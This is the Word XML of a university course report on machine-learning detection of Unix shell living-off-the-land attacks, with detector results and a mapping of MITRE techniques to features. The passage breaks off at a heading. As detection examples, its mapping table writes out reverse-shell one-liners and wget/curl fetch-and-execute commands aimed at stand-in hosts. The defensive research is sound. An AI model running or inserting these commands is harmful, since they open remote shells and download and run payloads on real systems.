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840" w:after="200" w:lineRule="auto" w:line="288"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>AI-Driven Detection of Living-off-the-Land</w:t>
        <w:br/>
        <w:t>Unix Shell Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="360" w:lineRule="auto" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK T1059.004 — Command &amp; Scripting Interpreter: Unix Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="360" w:lineRule="auto" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Course: Using AI for Intrusion and Malware Detection (3917)</w:t>
        <w:br/>
        <w:t>Reichman University — Efi Arazi School of Computer Science</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="360" w:lineRule="auto" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ben Volovelsky · ID 209361864 · bvolovelsky@nvidia.com</w:t>
        <w:br/>
        <w:t>Noam Delbari · ID 315005066 · noam.delbari@post.runi.ac.il</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:lineRule="auto" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Date of Submission: August 15, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:br w:type="page"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Problem.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Living-off-the-Land attacks (MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>T1059.004</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, Unix Shell) execute entirely through binaries the operating system already ships — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:t>. Nothing malicious is written to disk, so signature and file-reputation controls have nothing to inspect; the only surviving telemetry is the command line itself. This project asks whether a shell command string, in isolation, carries enough signal to separate an attacker's use of a system binary from an administrator's.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Data and method.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> We built two corpora with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>provenance-based labelling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — a command's label comes from where it was collected, never from a keyword rule, so the labels cannot encode the answer. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dataset 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (15,248 commands) is curated: offensive material from HackTricks, GTFOBins and Atomic Red Team against documentation and tutorial corpora. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dataset 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (9,576 commands) is operational: a Cowrie honeypot against real user shell history. Both are 25% malicious, so a detector that flags everything scores </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F1 = 0.400</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the do-nothing floor every result below is measured against. Train/test splits are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>grouped by command shape</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, not random, so no near-duplicate straddles the split; this is stricter than the ungrouped cross-validation the comparable literature uses and it costs us several F1 points. We engineered </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>43 behavioural features</w:t>
      </w:r>
      <w:r>
        <w:t>, selected from 68 candidates by a documented audit, and trained five detectors plus a character n-gram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model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D1 F1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D2 F1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D1 FPR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D2→D1 transfer F1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char n-gram baseline (TF-IDF + LR)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0.8808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0.8631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0.0385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0.2740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XGBoost-hybrid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0.8761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0.8482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0.0415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0.2756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1D-CNN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0.8603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0.8384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0.0555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0.3587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Random Forest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0.7963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0.7531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0.0337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0.1432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XGBoost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0.7856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0.7557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0.0717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0.2349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Isolation Forest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0.2492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0.1431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0.0079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0.2407</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:lineRule="auto" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Table 1. In-domain F1, false-positive rate, and D2-&gt;D1 transfer F1 for the five detectors and the character n-gram baseline on both datasets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Findings.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> In-domain detection works: the best engineered model reaches F1 0.876 at a 4.2% false-alarm rate. Three results matter more than that headline, and the report leads with all three rather than qualifying them at the end. First, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>the untuned character n-gram baseline beats all five engineered-feature models on both corpora</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and beats the strongest of them on false alarms as well (3.9% against the hybrid's 4.2%). Forty-three hand-designed, threat-mapped features do not out-perform a bag of character n-grams — which independently confirms the central representational claim of the ShellCore paper we benchmark against. Second, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cross-corpus transfer collapses below the do-nothing floor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: trained on operational traffic and tested on curated attacks, all six models score between 0.14 and 0.36 against a floor of 0.400. Models this accurate in-domain are learning corpus style, not attacker behaviour. Third, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>the recommended three-stage cascade is beaten by a single decision threshold</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the supervised model it contains, so we recommend against deploying it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Contribution.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The project's value is not a state-of-the-art number. It is a measured decomposition of the 20-point gap to published work into two halves — ≈10 points representation, ≈10 points corpus-and-protocol; an error forensics showing that 100% of the Random Forest's missed attacks sit at the benign end of every high-signal feature; and a quantified ceiling — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>+3.7 F1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — for the LLM arbitration layer, on the 5% of traffic where the best model is near-chance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 1 — Threat &amp; Telemetry Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three MITRE ATT&amp;CK sub-techniques observed in the dataset, mapped from shell telemetry to the source that captures them, to the engineered features (from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/features.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FEATURE_NAMES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) that encode them, to whether a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>provenance-labeled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> classifier can detect them reliably. The three are chosen to span the detectability spectrum: one cleanly detectable, one detectable-but-confounded, one effectively undetectable by content. Detectability claims are grounded in the error forensics of [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch8_findings.md</w:t>
      </w:r>
      <w:r>
        <w:t>](ch8_findings.md) and the source descriptions in [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docs/DATA_CARD.md</w:t>
      </w:r>
      <w:r>
        <w:t>](../docs/DATA_CARD.md).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Sub-technique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How it appears in shell telemetry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Dataset source &amp; how it is captured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Derived / Engineered Feature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Can a provenance-labeled classifier detect it reliably?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T1059.004 — Command &amp; Scripting Interpreter: Unix Shell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (reverse shells)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An interactive shell wired to a remote socket. Near-unique tokens: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bash -i &gt;&amp; /dev/tcp/10.0.0.5/4444 0&gt;&amp;1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>nc -e /bin/sh 1.2.3.4 4444</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc &lt;ip&gt; &lt;port&gt; &gt;/tmp/f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>exec 3&lt;&gt;/dev/tcp/…; /bin/bash &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.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payloads</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (PayloadsAllTheThings reverse-shell cheatsheet, lifted verbatim from markdown code blocks), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>quasarnix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (synthetic reverse shells combinatorially generated from ~34 threat-intel templates), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>slp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (pentest-resource corpus), and live </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>honeypot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Cowrie </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cowrie.command.input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> events of attacker-typed shells).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has_dev_tcp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has_shell_bin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n_redirect_out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has_fetch_bin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has_shell_flag_i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has_exec_flag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YES — reliably (the "easy" positives).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> The signature tokens (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/dev/tcp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nc -e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mkfifo /tmp/f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">) are essentially absent from every benign corpus, and the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_dev_tcp</w:t>
            </w:r>
            <w:r>
              <w:rPr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n_redirect_out</w:t>
            </w:r>
            <w:r>
              <w:rPr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has_shell_bin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> features fire hard. Forensics confirm it: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>`quasarnix` 0/58 and `payloads` 0/15 false negatives</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — both XGBoost-hybrid and the CNN catch every reverse shell. Caveat: reliability rides partly on the clean style of these sources; a heavily obfuscated variant (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>awk</w:t>
            </w:r>
            <w:r>
              <w:rPr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perl</w:t>
            </w:r>
            <w:r>
              <w:rPr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socat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>) could still slip past.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T1105 — Ingress Tool Transfer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (curl/wget download cradles)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Fetch-and-execute pipelines: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>wget http://185.22.11.9/x.sh -O- | sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>curl http://evil.host/a | bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cd /tmp || cd /dev/shm; wget &lt;url&gt;; chmod +x x; ./x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tftp -g -r bins &lt;ip&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">. Tells: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:r>
              <w:rPr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curl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>| sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> hand-off, a hard-coded IP/URL, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>chmod +x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/tmp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>·</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/dev/shm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> staging.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Dominantly </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>honeypot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Cowrie): the botnet dropper chain is the single most common attacker input captured, logged whole as one </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cowrie.command.input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> line. Also present in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>payloads</w:t>
            </w:r>
            <w:r>
              <w:rPr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hacktricks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> writeups.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has_fetch_bin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has_url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has_ipv4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n_pipes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has_staging_dir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has_pipe_to_shell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PARTIALLY — detectable in-domain, but confounded.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> The fetch-then-shell pattern is distinctive (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_fetch_bin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has_url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n_pipes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">), but </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
            <w:r>
              <w:rPr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wget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> are also everyday benign tools (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tldr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nl2bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">), so the provenance label conflates "download cradle" with "contains a URL/IP." The </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IPv4-presence-only shortcut probe scored ROC-AUC 0.535 (Dataset 1) / 0.523 (Dataset 2)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — a weak-but-real artifact the model can lean on. Because the honeypot's real-IP dropper style does not resemble curated benign data, this cue is register-specific and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>does not transfer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (it is a prime contributor to the D2→D1 collapse).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T1033 — System Owner/User Discovery</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (whoami/id)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Bare enumeration with no distinctive syntax: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; 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sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>id -u</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; and adjacent recon </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>uname -a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cat /etc/passwd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last | tail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hostname</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>. A single legitimate binary, often argument-free.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honeypot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Cowrie): the first stage of nearly every botnet script is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:r>
              <w:rPr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uname</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> fingerprinting; and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hacktricks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> enumeration pages. Provenance stamps these "attack" </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>only because of where they were captured</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, not what they are.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has_enum_bin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n_sensitive_paths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 — not reliably.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> These commands are byte-for-byte identical to routine administration, so there is no content signal to learn. A provenance classifier can only "detect" them by memorizing that they co-occur with a malicious source's </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>style</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — i.e. label contamination, not intent. Forensics bear this out: the most-confident false negatives are exactly this recon class (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>last | tail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pkaction --verbose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declare historywords</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">), and the same </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:r>
              <w:rPr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sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> sitting in a real user's history would be a false positive. This is the clearest case where provenance labeling </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cannot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> yield reliable detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:lineRule="auto" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Table 2. Telemetry and feature mapping for three T1059.004-adjacent sub-techniques: shell-log signature, capturing source, engineered features, and whether provenance labelling detects them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Takeaway.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detectability under provenance labels tracks how much the technique </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>lexically distinguishes itself from benign administration</w:t>
      </w:r>
      <w:r>
        <w:t>, not how dangerous it is. T1059.004 reverse shells carry their own unforgeable syntax and are caught perfectly; T1105 hides a real signal behind a URL/IP artifact that is genuine in-domain but non-transferable; T1033 discovery has no content signature at all and is "detected" only as a source-style artifact. A detector that reports high aggregate accuracy is therefore strong on the first class, brittle on the second, and effectively blind on the third — a distinction aggregate F1 hides but per-technique mapping makes explicit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
